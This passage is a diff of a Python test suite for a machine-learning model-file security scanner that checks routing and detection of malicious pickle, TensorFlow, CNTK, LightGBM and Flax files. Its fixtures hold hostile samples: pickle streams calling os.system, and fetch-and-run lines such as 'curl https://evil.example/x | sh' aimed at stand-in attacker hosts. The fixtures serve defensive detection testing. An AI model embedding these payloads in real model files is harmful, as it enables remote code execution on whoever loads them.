) -> None: @@ -346,38 +394,6 @@ def _valid_elf64_header() -> bytes: return bytes(header) -def _write_hf_tokenizer_json(path: Path, extra_fields: dict[str, Any] | None = None) -> Path: - payload: dict[str, Any] = { - "version": "1.0", - "added_tokens": [], - "model": { - "type": "BPE", - "vocab": {"hello": 0}, - "merges": [], - }, - } - if extra_fields: - payload.update(extra_fields) - path.write_text(json.dumps(payload), encoding="utf-8") - return path - - -def _write_ordered_hf_tokenizer_json( - path: Path, - *, - late_fields: str = "", - padding_size: int = 0, - model_fields: str = '"type":"BPE","vocab":{"hello":0},"merges":[]', - version_json: str = '"1.0"', -) -> Path: - padding = f',"padding":"{"x" * padding_size}"' if padding_size else "" - path.write_text( - (f'{{"version":{version_json},"added_tokens":[],"model":{{{model_fields}}}{padding}{late_fields}}}'), - encoding="utf-8", - ) - return path - - def _write_streamed_hf_tokenizer_json(path: Path, *, padding_size: int) -> Path: path.parent.mkdir(parents=True, exist_ok=True) with path.open("w", encoding="utf-8") as handle: @@ -394,18 +410,6 @@ def _write_streamed_hf_tokenizer_json(path: Path, *, padding_size: int) -> Path: return path -def _write_truncated_ordered_hf_tokenizer_json(path: Path, *, padding_size: int) -> Path: - path.write_text( - ( - '{"version":"1.0","added_tokens":[],' - '"model":{"type":"BPE","vocab":{"hello":0},"merges":[]},' - f'"padding":"{"x" * padding_size}' - ), - encoding="utf-8", - ) - return path - - def test_multi_file_directory_scan_shares_one_pickle_source_snapshot( tmp_path: Path, monkeypatch: pytest.MonkeyPatch, @@ -506,18 +510,7 @@ def _build_malicious_pickle(*, protocol: int | None = None) -> bytes: """Build a tiny pickle payload that exercises nested dangerous-opcode scanning.""" import os as os_module - class DangerousPayload: - """Serializable payload that reduces to a shell command invocation.""" - - def __reduce__(self) -> tuple[Any, tuple[str]]: - """Return a dangerous reducer target for scanner regression coverage.""" - return (os_module.system, ("echo core-dispatch-test",)) - - return pickle.dumps(DangerousPayload(), protocol=protocol) - - -def _core_binunicode(data: bytes) -> bytes: - return b"X" + len(data).to_bytes(4, "little") + data + return pickle.dumps(SystemCommandPayload("echo core-dispatch-test", lambda: os_module.system), protocol=protocol) def _core_legacy_pytorch_object_stream( @@ -599,16 +592,6 @@ def _build_protocolless_binary_benign_scalar_pickle() -> bytes: return b"\x8c\x02os\x94." -def _build_printable_utf8_ambiguous_binary_route() -> bytes: - """Build printable UTF-8 bytes that still require binary fail-closed routing.""" - return (b'""' + ("é" * 17).encode("utf-8")) * 4097 - - -def _build_line_broken_printable_utf8_ambiguous_binary_route() -> bytes: - """Build line-broken printable UTF-8 bytes requiring binary fail-closed routing.""" - return (b'""' + ("é" * 17).encode("utf-8") + b"\n") * 4097 - - def _build_printable_utf8_protobuf_candidate_route() -> bytes: """Build printable UTF-8 protobuf fields that exhaust bounded model routing.""" field_payload = ("é" * 60).encode("utf-8") + b" x:12" @@ -778,11 +761,6 @@ def test_scan_file_media_pickle_polyglot_detects_system_global(tmp_path: Path) - _assert_system_pickle_issue(result) -def _require_tf_protos() -> None: - if not _has_tf_protos(): - pytest.skip("TensorFlow protobuf stubs unavailable") - - def test_tensorflow_protobuf_bootstrap_avoids_shadow_package(tmp_path: Path) -> None: shadow_root = tmp_path / "shadow" shadow_tensorflow = shadow_root / "tensorflow" @@ -892,31 +870,7 @@ def test_tensorflow_trusted_root_honors_user_site_enablement( def _build_malicious_tf_metagraph() -> bytes: - _require_tf_protos() - import modelaudit.protos # noqa: F401 - - meta_graph_pb2 = importlib.import_module("tensorflow.core.protobuf.meta_graph_pb2") - metagraph = meta_graph_pb2.MetaGraphDef() - metagraph.meta_info_def.meta_graph_version = "modelaudit_route_test" - node = metagraph.graph_def.node.add() - node.name = "pyfunc_node" - node.op = "PyFunc" - node.attr["func"].s = b"python -c 'import os; os.system(\"curl https://evil.example/x | sh\")'" - return cast(bytes, metagraph.SerializeToString()) - - -def _build_malicious_tf_savedmodel() -> bytes: - _require_tf_protos() - import modelaudit.protos # noqa: F401 - - saved_model_pb2 = importlib.import_module("tensorflow.core.protobuf.saved_model_pb2") - saved_model = saved_model_pb2.SavedModel() - saved_model.saved_model_schema_version = 1 - metagraph = saved_model.meta_graphs.add() - node = metagraph.graph_def.node.add() - node.name = "pyfunc_node" - node.op = "PyFunc" - return cast(bytes, saved_model.SerializeToString()) + return build_malicious_tf_metagraph("modelaudit_route_test") def _write_orbax_metadata(directory: Path, *, restore_fn: str | None = None) -> Path: @@ -997,15 +951,8 @@ def test_directory_scan_invokes_orbax_owner_once_and_keeps_clean_result( ) -> None: model_dir = tmp_path / "orbax-model" metadata_path = _write_orbax_metadata(model_dir) - owner_calls: list[Path] = [] - original_scan = JaxCheckpointScanner.scan - def record_owner_scan(scanner: JaxCheckpointScanner, path: str) -> ScanResult: - if Path(path).is_dir(): - owner_calls.append(Path(path).resolve()) - return original_scan(scanner, path) - - monkeypatch.setattr(JaxCheckpointScanner, "scan", record_owner_scan) + owner_calls = _record_directory_owner_scans(monkeypatch, JaxCheckpointScanner) result = scan_model_directory_or_file(str(model_dir), cache_scan_results=False) @@ -1084,15 +1031,7 @@ def test_directory_scan_invokes_savedmodel_directory_owner_once( model_dir = tmp_path / "saved-model" model_dir.mkdir() (model_dir / "saved_model.pb").write_bytes(_build_malicious_tf_savedmodel()) - owner_calls: list[Path] = [] - original_scan = TensorFlowSavedModelScanner.scan - - def record_savedmodel_scan(scanner: TensorFlowSavedModelScanner, path: str) -> ScanResult: - if Path(path).is_dir(): - owner_calls.append(Path(path).resolve()) - return original_scan(scanner, path) - - monkeypatch.setattr(TensorFlowSavedModelScanner, "scan", record_savedmodel_scan) + owner_calls = _record_directory_owner_scans(monkeypatch, TensorFlowSavedModelScanner) result = scan_model_directory_or_file(str(model_dir), cache_scan_results=False) @@ -1214,13 +1153,7 @@ def test_directory_scan_does_not_follow_external_orbax_marker_before_containment model_dir.mkdir() marker_path = model_dir / "metadata.json" marker_path.symlink_to(outside_metadata) - owner_calls: list[str] = [] - - def record_owner_scan(_scanner: JaxCheckpointScanner, owner_path: str) -> ScanResult: - owner_calls.append(owner_path) - raise AssertionError("owner scan must not run before path containment") - - monkeypatch.setattr(JaxCheckpointScanner, "scan", record_owner_scan) + owner_calls = _reject_owner_before_containment(monkeypatch, JaxCheckpointScanner) result = scan_model_directory_or_file(str(model_dir), cache_scan_results=False) @@ -1252,13 +1185,7 @@ def test_directory_scan_does_not_follow_external_savedmodel_marker_before_contai model_dir.mkdir() marker_path = model_dir / "saved_model.pb" marker_path.symlink_to(outside_model) - owner_calls: list[str] = [] - - def record_owner_scan(_scanner: TensorFlowSavedModelScanner, owner_path: str) -> ScanResult: - owner_calls.append(owner_path) - raise AssertionError("owner scan must not run before path containment") - - monkeypatch.setattr(TensorFlowSavedModelScanner, "scan", record_owner_scan) + owner_calls = _reject_owner_before_containment(monkeypatch, TensorFlowSavedModelScanner) result = scan_model_directory_or_file(str(model_dir), cache_scan_results=False) @@ -1301,15 +1228,7 @@ def test_unrelated_external_symlink_does_not_suppress_savedmodel_owner_scan( outside_variable.write_bytes(b"opaque tensor values") unrelated_link = variables_dir / "variables.data-00000-of-00001" unrelated_link.symlink_to(outside_variable) - owner_calls: list[Path] = [] - original_scan = TensorFlowSavedModelScanner.scan - - def record_savedmodel_scan(scanner: TensorFlowSavedModelScanner, owner_path: str) -> ScanResult: - if Path(owner_path).is_dir(): - owner_calls.append(Path(owner_path).resolve()) - return original_scan(scanner, owner_path) - - monkeypatch.setattr(TensorFlowSavedModelScanner, "scan", record_savedmodel_scan) + owner_calls = _record_directory_owner_scans(monkeypatch, TensorFlowSavedModelScanner) result = scan_model_directory_or_file(str(model_dir), cache_scan_results=False) @@ -1609,14 +1528,8 @@ def test_directory_scan_uses_descriptor_cwd_when_owner_fd_paths_are_unavailable( ) -> None: model_dir = tmp_path / "orbax-model" _write_orbax_metadata(model_dir) - original_stat = Path.stat owner_paths: list[tuple[str, Path]] = [] - def hide_descriptor_aliases(candidate: Path, *args: Any, **kwargs: Any) -> os.stat_result: - if str(candidate).startswith(("/proc/self/fd/", "/dev/fd/")): - raise FileNotFoundError(str(candidate)) - return original_stat(candidate, *args, **kwargs) - def record_owner_scan(_scanner: JaxCheckpointScanner, owner_path: str) -> ScanResult: if Path(owner_path).is_dir(): owner_paths.append((owner_path, Path(owner_path).resolve())) @@ -1624,7 +1537,7 @@ def record_owner_scan(_scanner: JaxCheckpointScanner, owner_path: str) -> ScanRe owner_result.finish() return owner_result - monkeypatch.setattr(Path, "stat", hide_descriptor_aliases) + _hide_descriptor_paths(monkeypatch) monkeypatch.setattr(JaxCheckpointScanner, "scan", record_owner_scan) result = scan_model_directory_or_file(str(model_dir), cache_scan_results=False) @@ -1650,23 +1563,10 @@ def test_directory_scan_uses_staged_snapshot_without_descriptor_owner_binding( ), encoding="utf-8", ) - original_stat = Path.stat - owner_paths: list[Path] = [] - original_scan = JaxCheckpointScanner.scan - - def hide_descriptor_aliases(candidate: Path, *args: Any, **kwargs: Any) -> os.stat_result: - if str(candidate).startswith(("/proc/self/fd/", "/dev/fd/")): - raise FileNotFoundError(str(candidate)) - return original_stat(candidate, *args, **kwargs) - - def record_owner_scan(scanner: JaxCheckpointScanner, owner_path: str) -> ScanResult: - if Path(owner_path).is_dir(): - owner_paths.append(Path(owner_path).resolve()) - return original_scan(scanner, owner_path) - monkeypatch.setattr(Path, "stat", hide_descriptor_aliases) + _hide_descriptor_paths(monkeypatch) monkeypatch.setattr(os, "fchdir", None, raising=False) - monkeypatch.setattr(JaxCheckpointScanner, "scan", record_owner_scan) + owner_paths = _record_directory_owner_scans(monkeypatch, JaxCheckpointScanner) result = scan_model_directory_or_file(str(model_dir), cache_scan_results=False) owner_metadata = result.file_metadata[str(model_dir)] @@ -2461,9 +2361,7 @@ def test_savedmodel_owner_allows_large_file_backed_hdf5_child( _write_large_benign_keras_hdf5(hdf5_path) hdf5_scans: list[Path] = [] - owner_calls: list[Path] = [] original_hdf5_scan = KerasH5Scanner.scan - original_owner_scan = TensorFlowSavedModelScanner.scan original_hash = core_module._calculate_file_hash def record_hdf5_scan(scanner: KerasH5Scanner, path: str) -> ScanResult: @@ -2471,18 +2369,13 @@ def record_hdf5_scan(scanner: KerasH5Scanner, path: str) -> ScanResult: hdf5_scans.append(Path(path).resolve()) return original_hdf5_scan(scanner, path) - def record_owner_scan(scanner: TensorFlowSavedModelScanner, owner_path: str) -> ScanResult: - if Path(owner_path).is_dir(): - owner_calls.append(Path(owner_path).resolve()) - return original_owner_scan(scanner, owner_path) - def reject_large_hdf5_hash(path: str, *, deadline: float | None = None) -> str: if Path(path).resolve() == hdf5_path.resolve(): pytest.fail("large file-backed HDF5 child must not be whole-file hashed") return original_hash(path, deadline=deadline) monkeypatch.setattr(KerasH5Scanner, "scan", record_hdf5_scan) - monkeypatch.setattr(TensorFlowSavedModelScanner, "scan", record_owner_scan) + owner_calls = _record_directory_owner_scans(monkeypatch, TensorFlowSavedModelScanner) monkeypatch.setattr(core_module, "_calculate_file_hash", reject_large_hdf5_hash) result = scan_model_directory_or_file(str(model_dir), cache_enabled=False) @@ -2734,10 +2627,7 @@ def _write_sparse_oversized_safetensors_candidate( path: Path, header_len: int = SAFETENSORS_ROUTING_HEADER_PARSE_BYTES + 1, ) -> None: - with path.open("wb") as handle: - handle.write(struct.pack(" None: @@ -3023,35 +2913,6 @@ def test_hdf5_signature_probe_rejects_corrupted_v2_checksum(tmp_path: Path) -> N assert find_hdf5_signature_offset(str(polyglot)) is None -def _write_malicious_cntk(path: Path, include_structure: bool = True) -> None: - prefix = b"\x08\x01\x12\x11\x0a\x07version\x12\x06\x08\x01\x10\x03(\x02\x12\x09\x0a\x03uid\x12\x02ab" - structure = b" CompositeFunction primitive_functions " if include_structure else b"" - payload = b" native_user_function loadlibrary C:\\temp\\evil.dll powershell -c curl http://evil.example/p.sh " - path.write_bytes(prefix + structure + payload) - - -def _write_delayed_flax_cntk_overlap(path: Path) -> None: - prefix = b"\x08\x01\x12\x11\x0a\x07version\x12\x06\x08\x01\x10\x03(\x02\x12\x09\x0a\x03uid\x12\x02ab" - structure = b" CompositeFunction primitive_functions " - delayed_flax_root = flax_msgpack_scanner.msgpack.packb( - {"params": {"w": [1, 2, 3]}, "__reduce__": "attacker_callable"}, - use_bin_type=True, - ) - path.write_bytes(prefix + structure + (b"\xc0" * (FLAX_MSGPACK_STRUCTURE_READ_BYTES + 1)) + delayed_flax_root) - - -def _write_malicious_lightgbm(path: Path, valid: bool = True) -> None: - body = "tree=0\nversion=v4\nnum_class=1\n" - if valid: - body += ( - "num_tree_per_iteration=1\nmax_feature_idx=2\ntree_sizes=12\nnum_leaves=2\n" - "split_feature=0\nleaf_value=0.1 0.2\n" - "metadata=os.system('curl https://collector.evil.example/payload.sh | sh')\n" - "callback_url=https://collector.evil.example/payload.sh\n" - ) - path.write_text(body, encoding="utf-8") - - def _create_zip_with_ordered_entries(path: Path, entries: list[tuple[str, bytes]]) -> None: """Write a ZIP archive with duplicate entries in caller-defined order.""" with zipfile.ZipFile(path, "w") as archive: @@ -3350,15 +3211,7 @@ def test_directory_scan_groups_hf_cache_sharded_symlinks( blob_paths.append(blob_path.resolve()) shard_links.append(shard_link) - captured_configs: list[dict[str, Any]] = [] - calls: list[str] = [] - - def fake_scan_file(path: str, config: dict[str, Any] | None = None) -> ScanResult: - calls.append(path) - captured_configs.append(dict(config or {})) - return _mock_sharded_scan_result(sum(blob_path.stat().st_size for blob_path in blob_paths)) - - monkeypatch.setattr(core_module, "scan_file", fake_scan_file) + captured_configs, calls = _record_shard_scans(monkeypatch, blob_paths) result = core_module.scan_model_directory_or_file(str(snapshots_dir), cache_scan_results=False) @@ -3679,15 +3532,7 @@ def test_directory_scan_deduplicates_identical_hf_shard_families_across_snapshot Path("../../blobs") / blob_path.name ) - captured_configs: list[dict[str, Any]] = [] - calls: list[str] = [] - - def fake_scan_file(path: str, config: dict[str, Any] | None = None) -> ScanResult: - calls.append(path) - captured_configs.append(dict(config or {})) - return _mock_sharded_scan_result(sum(blob_path.stat().st_size for blob_path in blob_paths)) - - monkeypatch.setattr(core_module, "scan_file", fake_scan_file) + captured_configs, calls = _record_shard_scans(monkeypatch, blob_paths) result = core_module.scan_model_directory_or_file(str(cache_dir / "snapshots"), cache_scan_results=False) @@ -3774,13 +3619,7 @@ def test_directory_scan_keeps_distinct_hf_shard_filename_patterns( snapshot.mkdir(parents=True, exist_ok=True) (snapshot / filename).symlink_to(Path("../../blobs") / blob_path.name) - calls: list[str] = [] - - def fake_scan_file(path: str, config: dict[str, Any] | None = None) -> ScanResult: - calls.append(path) - return _mock_sharded_scan_result(sum(blob_path.stat().st_size for blob_path in blob_paths)) - - monkeypatch.setattr(core_module, "scan_file", fake_scan_file) + calls = _record_shard_calls(monkeypatch, blob_paths) result = core_module.scan_model_directory_or_file(str(cache_dir / "snapshots"), cache_scan_results=False) @@ -3808,13 +3647,7 @@ def test_directory_scan_deduplicates_hf_shard_aliases_against_raw_blobs( blob_paths.append(blob_path.resolve()) (snapshot / f"model-{shard_index:05d}-of-00002.safetensors").symlink_to(Path("../../blobs") / blob_path.name) - calls: list[str] = [] - - def fake_scan_file(path: str, config: dict[str, Any] | None = None) -> ScanResult: - calls.append(path) - return _mock_sharded_scan_result(sum(blob_path.stat().st_size for blob_path in blob_paths)) - - monkeypatch.setattr(core_module, "scan_file", fake_scan_file) + calls = _record_shard_calls(monkeypatch, blob_paths) result = core_module.scan_model_directory_or_file(str(cache_dir), cache_scan_results=False) @@ -3917,17 +3750,7 @@ def fake_scan_advanced_large_file( result.finish(success=True) return result - def fake_should_use_advanced_handler( - path: str, - *, - allowed_shard_paths: list[str] | None = None, - allowed_shard_targets: core_module.ValidatedShardTargets | None = None, - ) -> bool: - captured_selection_allowed_paths.append(allowed_shard_paths) - captured_allowed_targets.append(allowed_shard_targets) - return path == str(shard) - - monkeypatch.setattr(core_module, "should_use_advanced_handler", fake_should_use_advanced_handler) + _install_advanced_handler_selection(monkeypatch, shard, captured_selection_allowed_paths, captured_allowed_targets) monkeypatch.setattr(core_module, "_select_preferred_scanner_id", fake_select_preferred_scanner_id) monkeypatch.setattr(core_module._registry, "get_scanner_for_path", fake_get_scanner_for_path) monkeypatch.setattr(core_module, "scan_advanced_large_file", fake_scan_advanced_large_file) @@ -4378,17 +4201,7 @@ def fake_scan_advanced_large_file( result.finish(success=True) return result - def fake_should_use_advanced_handler( - path: str, - *, - allowed_shard_paths: list[str] | None = None, - allowed_shard_targets: core_module.ValidatedShardTargets | None = None, - ) -> bool: - captured_selection_allowed_paths.append(allowed_shard_paths) - captured_allowed_targets.append(allowed_shard_targets) - return path == str(shard) - - monkeypatch.setattr(core_module, "should_use_advanced_handler", fake_should_use_advanced_handler) + _install_advanced_handler_selection(monkeypatch, shard, captured_selection_allowed_paths, captured_allowed_targets) monkeypatch.setattr(core_module, "_select_preferred_scanner_id", fake_select_preferred_scanner_id) monkeypatch.setattr(core_module._registry, "load_scanner_by_id", lambda scanner_id: DummyPreferredScanner) monkeypatch.setattr( @@ -5281,18 +5094,9 @@ def test_scan_file_routes_empty_module_stack_global_safetensors_collision_to_pic def test_scan_file_keeps_empty_bytes_stack_global_safetensors_collision_clean(tmp_path: Path) -> None: - polyglot = tmp_path / "empty-bytes-stack-global.unknown" - _write_safetensors_pickle_tail(polyglot, ord("V"), b"\n0C\x00\x8c\x02os\x93.") - - assert file_detection.detect_file_format(str(polyglot)) == "safetensors" - assert file_detection.detect_file_format_from_magic(str(polyglot)) == "safetensors" - assert file_detection.detect_file_format_for_skip_filter(str(polyglot)) == "safetensors" - - result = scan_file(str(polyglot), config={"cache_enabled": False}) - - assert result.scanner_name == "safetensors" - assert result.success is True - assert not result.issues + _assert_empty_stack_global_collision_clean( + tmp_path, ("empty-bytes-stack-global.unknown"), (b"\n0C\x00\x8c\x02os\x93.") + ) def test_scan_file_routes_security_pickle_after_early_frame_stop(tmp_path: Path) -> None: @@ -5312,48 +5116,21 @@ def test_scan_file_routes_security_pickle_after_early_frame_stop(tmp_path: Path) def test_scan_file_routes_security_pickle_after_valid_list_setitem(tmp_path: Path) -> None: - pickle_tail = b"\n0]NaK\x00Ns0cos\nsystem\n(Vtrue\ntR." - polyglot = tmp_path / "list-setitem.unknown" - _write_safetensors_pickle_tail(polyglot, ord("V"), pickle_tail) - - assert file_detection.detect_file_format(str(polyglot)) == "pickle" - assert file_detection.detect_file_format_from_magic(str(polyglot)) == "pickle" - assert file_detection.detect_file_format_for_skip_filter(str(polyglot)) == "pickle" - - result = scan_file(str(polyglot), config={"cache_enabled": False}) - - assert result.scanner_name == "pickle" - _assert_system_pickle_issue(result) + _assert_safetensors_pickle_stack_routing( + tmp_path, (b"\n0]NaK\x00Ns0cos\nsystem\n(Vtrue\ntR."), ("list-setitem.unknown") + ) def test_scan_file_routes_security_pickle_after_memoized_list_mutation(tmp_path: Path) -> None: - pickle_tail = b"\n0]\x94Na0h\x00K\x00Ns0cos\nsystem\n(Vtrue\ntR." - polyglot = tmp_path / "memoized-list-mutation.unknown" - _write_safetensors_pickle_tail(polyglot, ord("V"), pickle_tail) - - assert file_detection.detect_file_format(str(polyglot)) == "pickle" - assert file_detection.detect_file_format_from_magic(str(polyglot)) == "pickle" - assert file_detection.detect_file_format_for_skip_filter(str(polyglot)) == "pickle" - - result = scan_file(str(polyglot), config={"cache_enabled": False}) - - assert result.scanner_name == "pickle" - _assert_system_pickle_issue(result) + _assert_safetensors_pickle_stack_routing( + tmp_path, (b"\n0]\x94Na0h\x00K\x00Ns0cos\nsystem\n(Vtrue\ntR."), ("memoized-list-mutation.unknown") + ) def test_scan_file_routes_security_pickle_after_boolean_list_index(tmp_path: Path) -> None: - pickle_tail = b"\n0]Na\x89Ns0cos\nsystem\n(Vtrue\ntR." - polyglot = tmp_path / "boolean-list-index.unknown" - _write_safetensors_pickle_tail(polyglot, ord("V"), pickle_tail) - - assert file_detection.detect_file_format(str(polyglot)) == "pickle" - assert file_detection.detect_file_format_from_magic(str(polyglot)) == "pickle" - assert file_detection.detect_file_format_for_skip_filter(str(polyglot)) == "pickle" - - result = scan_file(str(polyglot), config={"cache_enabled": False}) - - assert result.scanner_name == "pickle" - _assert_system_pickle_issue(result) + _assert_safetensors_pickle_stack_routing( + tmp_path, (b"\n0]Na\x89Ns0cos\nsystem\n(Vtrue\ntR."), ("boolean-list-index.unknown") + ) @pytest.mark.parametrize( @@ -5546,18 +5323,9 @@ def test_scan_file_routes_large_safetensors_pickle_from_declared_frame_end(tmp_p def test_scan_file_keeps_failed_pickle_load_with_memo_safetensors_collision_clean(tmp_path: Path) -> None: - polyglot = tmp_path / "failed-load-with-memo.unknown" - _write_safetensors_pickle_tail(polyglot, ord("V"), b"\n0]q\x00acos\nsystem\n.") - - assert file_detection.detect_file_format(str(polyglot)) == "safetensors" - assert file_detection.detect_file_format_from_magic(str(polyglot)) == "safetensors" - assert file_detection.detect_file_format_for_skip_filter(str(polyglot)) == "safetensors" - - result = scan_file(str(polyglot), config={"cache_enabled": False}) - - assert result.scanner_name == "safetensors" - assert result.success is True - assert not result.issues + _assert_empty_stack_global_collision_clean( + tmp_path, ("failed-load-with-memo.unknown"), (b"\n0]q\x00acos\nsystem\n.") + ) def test_pickle_frame_alternates_share_one_work_budget() -> None: @@ -5715,18 +5483,9 @@ def test_scan_file_keeps_known_type_invalid_pickle_safetensors_clean( def test_scan_file_routes_none_state_build_safetensors_overlap_to_pickle(tmp_path: Path) -> None: - pickle_tail = b"\n0NNbcos\nsystem\n(Vtrue\ntR." - polyglot = tmp_path / "none-state-build-pickle.unknown" - _write_safetensors_pickle_tail(polyglot, ord("V"), pickle_tail) - - assert file_detection.detect_file_format(str(polyglot)) == "pickle" - assert file_detection.detect_file_format_from_magic(str(polyglot)) == "pickle" - assert file_detection.detect_file_format_for_skip_filter(str(polyglot)) == "pickle" - - result = scan_file(str(polyglot), config={"cache_enabled": False}) - - assert result.scanner_name == "pickle" - _assert_system_pickle_issue(result) + _assert_safetensors_pickle_stack_routing( + tmp_path, (b"\n0NNbcos\nsystem\n(Vtrue\ntR."), ("none-state-build-pickle.unknown") + ) def test_scan_file_merges_safetensors_findings_for_pickle_overlap(tmp_path: Path) -> None: @@ -7148,52 +6907,14 @@ def test_scan_file_selected_pickle_does_not_claim_nested_binary_header_like_flax def test_scan_file_preserves_binary_pickle_findings_when_stop_follows_probe_window(tmp_path: Path) -> None: - if not flax_msgpack_scanner.HAS_MSGPACK: - pytest.skip("msgpack unavailable") - - checkpoint = tmp_path / "delayed-binary-pickle-stop.jpg" - pickle_stream = ( - b"\x80\x04cos\nsystem\n(S'echo pwned'\ntR" + (b"N0" * (file_detection.PROTO0_1_MAX_PROBE_BYTES // 2 + 1)) + b"." - ) - checkpoint.write_bytes( - pickle_stream - + flax_msgpack_scanner.msgpack.packb( - {"params": {"w": [1, 2, 3]}}, - use_bin_type=True, - ) - ) - - result = scan_file(str(checkpoint), config={"cache_scan_results": False}) - - assert result.scanner_name == "flax_msgpack" - assert any( - issue.rule_code == "S201" and any(global_name in issue.message.lower() for global_name in _SYSTEM_GLOBAL_NAMES) - for issue in result.issues + _assert_late_pickle_stop_in_msgpack( + tmp_path, ("delayed-binary-pickle-stop.jpg"), (b"\x80\x04cos\nsystem\n(S'echo pwned'\ntR"), (b".") ) def test_scan_file_preserves_binary_pickle_findings_when_dangerous_opcode_follows_probe_window(tmp_path: Path) -> None: - if not flax_msgpack_scanner.HAS_MSGPACK: - pytest.skip("msgpack unavailable") - - checkpoint = tmp_path / "late-binary-pickle-dangerous-global.jpg" - pickle_stream = ( - b"\x80\x04" + (b"N0" * (file_detection.PROTO0_1_MAX_PROBE_BYTES // 2 + 1)) + b"cos\nsystem\n(S'echo pwned'\ntR." - ) - checkpoint.write_bytes( - pickle_stream - + flax_msgpack_scanner.msgpack.packb( - {"params": {"w": [1, 2, 3]}}, - use_bin_type=True, - ) - ) - - result = scan_file(str(checkpoint), config={"cache_scan_results": False}) - - assert result.scanner_name == "flax_msgpack" - assert any( - issue.rule_code == "S201" and any(global_name in issue.message.lower() for global_name in _SYSTEM_GLOBAL_NAMES) - for issue in result.issues + _assert_late_pickle_stop_in_msgpack( + tmp_path, ("late-binary-pickle-dangerous-global.jpg"), (b"\x80\x04"), (b"cos\nsystem\n(S'echo pwned'\ntR.") ) @@ -7509,39 +7230,12 @@ def test_scan_file_routes_malicious_explicit_flax_suffix_to_flax_scanner(tmp_pat @pytest.mark.parametrize("suffix", [".ckpt", ".checkpoint", ".orbax-checkpoint"]) def test_scan_file_routes_msgpack_checkpoint_overlap_suffixes_to_flax_scanner(tmp_path: Path, suffix: str) -> None: - if not flax_msgpack_scanner.HAS_MSGPACK: - pytest.skip("msgpack unavailable") - - checkpoint = tmp_path / f"malicious{suffix}" - checkpoint.write_bytes( - flax_msgpack_scanner.msgpack.packb({"params": {"w": [1, 2, 3]}, "__reduce__": "os.system"}, use_bin_type=True) - ) - - result = scan_file(str(checkpoint), config={"cache_scan_results": False}) - - assert result.scanner_name == "flax_msgpack" - assert result.success is False - assert any(issue.message == "Suspicious object attribute detected: __reduce__" for issue in result.issues) + _assert_flax_overlap_routed(tmp_path, suffix) @pytest.mark.parametrize("suffix", [".txt", ".md", ".markdown", ".rst", ".ini", ".cfg", ".toml", ".conf"]) def test_scan_file_routes_malicious_flax_checkpoint_under_skipped_suffix(tmp_path: Path, suffix: str) -> None: - if not flax_msgpack_scanner.HAS_MSGPACK: - pytest.skip("msgpack unavailable") - - checkpoint = tmp_path / f"malicious{suffix}" - checkpoint.write_bytes( - flax_msgpack_scanner.msgpack.packb( - {"params": {"w": [1, 2, 3]}, "__reduce__": "os.system"}, - use_bin_type=True, - ) - ) - - result = scan_file(str(checkpoint), config={"cache_scan_results": False}) - - assert result.scanner_name == "flax_msgpack" - assert result.success is False - assert any(issue.message == "Suspicious object attribute detected: __reduce__" for issue in result.issues) + _assert_flax_overlap_routed(tmp_path, suffix) @pytest.mark.parametrize( @@ -10376,19 +10070,12 @@ def test_scan_file_keeps_unreadable_skops_member_inconclusive_in_llamafile_polyg original_open = zipfile.ZipFile.open - def open_with_failure( - archive: zipfile.ZipFile, - name: str | zipfile.ZipInfo, - mode: Literal["r", "w"] = "r", - pwd: bytes | None = None, - *, - force_zip64: bool = False, - ) -> Any: - if isinstance(name, zipfile.ZipInfo) and name.filename == "README.md": - raise zipfile.BadZipFile("CRC mismatch") - return original_open(archive, name, mode, pwd, force_zip64=force_zip64) - - monkeypatch.setattr(zipfile.ZipFile, "open", open_with_failure) + install_zip_open_failure( + monkeypatch, + original_open, + lambda name: isinstance(name, zipfile.ZipInfo) and name.filename == "README.md", + lambda: zipfile.BadZipFile("CRC mismatch"), + ) result = scan_model_directory_or_file(str(polyglot), cache_enabled=False) @@ -10624,47 +10311,11 @@ def test_scan_file_routes_misnamed_skops_archive_by_bare_schema_content(tmp_path def test_scan_file_does_not_route_nested_bare_schema_near_match_to_skops(tmp_path: Path) -> None: - disguised_zip = tmp_path / "nested-schema-near-match.jpg" - _create_misnamed_zip( - disguised_zip, - { - "nested/schema": json.dumps( - { - "__class__": "Pipeline", - "__module__": "sklearn.pipeline", - "__loader__": "ObjectNode", - "content": {}, - } - ).encode("utf-8"), - }, - ) - - result = scan_file(str(disguised_zip)) - - assert result.scanner_name == "zip" - assert not any("CVE-2025-" in check.name for check in result.checks) + _assert_generic_zip_schema_near_match(tmp_path, ("nested-schema-near-match.jpg"), ("nested/schema")) def test_scan_file_does_not_route_near_match_schema_zip_to_skops(tmp_path: Path) -> None: - disguised_zip = tmp_path / "schema.jpg" - _create_misnamed_zip( - disguised_zip, - { - "schema.json": json.dumps( - { - "__class__": "Pipeline", - "__module__": "sklearn.pipeline", - "__loader__": "ObjectNode", - "content": {}, - } - ).encode("utf-8"), - }, - ) - - result = scan_file(str(disguised_zip)) - - assert result.scanner_name == "zip" - assert not any("CVE-2025-" in check.name for check in result.checks) + _assert_generic_zip_schema_near_match(tmp_path, ("schema.jpg"), ("schema.json")) def test_scan_file_routes_oversized_misnamed_skops_schema_to_skops(tmp_path: Path) -> None: @@ -10827,12 +10478,7 @@ def test_scan_file_fails_closed_when_content_routed_keras_zip_scanner_unavailabl "cache_dir": str(cache_dir), "min_cache_file_size": 0, } - original_load_scanner = core_module._registry._load_scanner - - def load_scanner(scanner_id: str) -> type[Any] | None: - if scanner_id == "keras_zip": - return None - return original_load_scanner(scanner_id) + load_scanner = without_keras_zip_scanner(core_module._registry._load_scanner) monkeypatch.setattr(core_module._registry, "_load_scanner", load_scanner) @@ -10882,15 +10528,7 @@ def test_scan_file_bypasses_stale_cache_when_keras_zip_scanner_becomes_unavailab "cache_dir": str(cache_dir), "min_cache_file_size": 0, } - original_load_scanner = core_module._registry._load_scanner - keras_scanner_available = True - - def load_scanner(scanner_id: str) -> type[Any] | None: - if scanner_id == "keras_zip" and not keras_scanner_available: - return None - return original_load_scanner(scanner_id) - - monkeypatch.setattr(core_module._registry, "_load_scanner", load_scanner) + keras_scanner_available = _switch_keras_availability(monkeypatch) reset_cache_manager() try: @@ -10898,7 +10536,7 @@ def load_scanner(scanner_id: str) -> type[Any] | None: assert cached.success is True assert get_cache_manager(str(cache_dir), enabled=True).get_stats()["total_entries"] > 0 - keras_scanner_available = False + keras_scanner_available[0] = False unavailable = scan_file(str(disguised_keras), config=config) finally: reset_cache_manager() @@ -10964,15 +10602,7 @@ def test_scan_file_bypasses_outer_archive_cache_when_nested_scanner_becomes_unav "cache_dir": str(cache_dir), "min_cache_file_size": 0, } - original_load_scanner = core_module._registry._load_scanner - keras_scanner_available = True - - def load_scanner(scanner_id: str) -> type[Any] | 